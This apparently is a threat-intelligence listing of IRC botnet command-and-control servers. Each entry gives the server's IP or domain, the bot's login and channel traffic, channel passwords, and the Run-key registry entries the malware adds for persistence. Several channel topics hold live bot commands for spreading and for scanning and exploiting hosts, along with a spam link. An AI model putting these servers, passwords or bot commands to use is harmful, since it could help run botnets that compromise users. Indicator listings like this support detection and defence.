70.61.101.163

Uncategorized

Remote Host Port Number
70.61.101.163 9595 PASS prison
72.233.89.199 80
91.198.22.71 80

PONG leaf.44274.com
NICK {iNF-00-USA-XP-COMP-0885}
USER MEAT * 0 :COMP
JOIN ###mini
NICK {00-USA-XP-COMP-0172}

Other details
* The following ports were open in the system:

Port Protocol Process
1051 TCP usbmgr.exe (%Windir%\usbmgr.exe)
1053 TCP usbmgr.exe (%Windir%\usbmgr.exe)
1054 TCP usbmgr.exe (%Windir%\usbmgr.exe)

Registry Modifications
* The ...

dell.special.jp

Uncategorized

dell.special.jp 210.168.252.109
Opened listening TCP connection on port: 113
C&C Server: 210.168.252.109:17402
Server Password:
Username: fdlea
Nickname: DEU|77874
Channel: ##new## (Password: gatesgates)
Channeltopic: :.asc asn445 100 0 2555 -a -b -r

Registry Changes by all processes
Create or Open
Changes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “Windows Service Agent” = agl23.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices “Windows Service Agent” = agl23.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “Windows Service ...

188.72.205.89

Uncategorized

Remote Host Port Number
188.72.205.89 6567

NICK {XPUSA843752}
PONG irc.priv8net.com
USER COMPUTERNAME * 0 :COMPUTERNAME
MODE {XPUSA843752} -ix
JOIN #putocm
MODE #putocm -ix

Registry Modifications
* The newly created Registry Values are:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + Windows Services = “service.exe”
    so that service.exe runs every time Windows starts
  o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    + Windows Update = “%Temp%\service.exe”
    so ...

95.142.163.184

Uncategorized

(IRC) [00|FRA|881622]: Bot sniff “95.142.163.184:6667” ircd here “:VirUs-pqrquk!VirUs@151.81.7.141 JOIN :#VirUs.aLiS# “
(IRC) [00|FRA|881622]: Bot sniff “95.142.163.184:6667” “:VirUs-khnmlc!VirUs@190.73.73.197 JOIN :#VirUs.aLiS# “

norks.org

Uncategorized

3.68.16.30:80 – :norks.org 001 bfqiebwf :Welcome to the Internet Relay Network bfqiebwf
-psniff- suspicious BOT packet from: 74.117.174.110:21321 ircd here – :cbl-sd-74-1.aster.com.do 302 ] [laMer][lnwhcdrj :][laMer][lnwhcdrj=+~laMerl@122-120-130-36.dynamic.hinet.net
-psniff- suspicious BOT packet from: 74.117.174.82:16667 – ircd here :s11.cpe.netcabo.uk 404 [M][TWN]XP-SP1[00]1694 #l# :You must have a registered nick (+r) to talk on this channel (#l#)

178.63.148.49

Uncategorized

Remote Host Port Number
178.63.148.49 6667

NICK n{USA|XP}793757
USER 7937 “” “TsGh” :7937
JOIN #Adam

Registry Modifications
* The newly created Registry Values are:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + Windows Update System = “%AppData%\winlogon.exe”
    + UserFaultCheck = “%System%\dumprep 0 -u”
    so that winlogon.exe runs every time Windows starts
  o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    + Windows Update System = “%AppData%\winlogon.exe”
    so ...

95.154.242.89

Uncategorized

95.154.242.89:4244” “:HTTP1.4 302 FRA|2045414 :FRA|2045414=+gfgjbblu@41.141.112.125
:FRA|2045414!gfgjbblu@41.141.112.125 JOIN :##neo##
:HTTP1.4 332 FRA|2045414 ##neo## :&psniff on
:HTTP1.4 333 FRA|2045414 ##neo## Coded 1288523091
:HTTP1.4 302 FRA|2045414 :FRA|2045414=+gfgjbblu@41.141.112.125
:HTTP1.4 302 FRA|2045414 :FRA|2045414=+gfgjbblu@41.141.112.125 “

72.20.51.198

Uncategorized

72.20.51.198:6667”: – “JOIN #die chanpass
MODE [FRA|00|P|88890] -ix
JOIN #die chanpass
MODE [FRA|00|P|88890] -ix
JOIN #die chanpass
MODE [FRA|00|P|88890] -ix
JOIN #die chanpass “

Fooker.net

Uncategorized

78.129.228.56:65267: – “JOIN #NzM# screwu nick:[M]ESP|00|XP|SP3|9898708 [M]ESP|00|XP|SP3|3576563 #NzM# :.root.start dcom135 200 0 0 219.x.x.x -a -r -s :Fooker.net 333 [M]ESP|00|XP|SP3|3576563 #NzM# weebz

1.sarkievi.net

Uncategorized

Remote Host Port Number
212.175.158.43 6667 PASS lnx

Resolved : [1.sarkievi.net] To [212.175.158.43]
MODE [00|USA|227819] -ix
JOIN #Cd# NhG
NICK [00|USA|227819]
USER XP-7853 * 0 :COMPUTERNAME
Now talking in #Cd#
Topic On: [ #Cd# ] [ .msn.msg Foto 😀 http://to.ly/7Lkw?= ]
Topic By: [ Samuray ]

Other details
* The following port was open in ...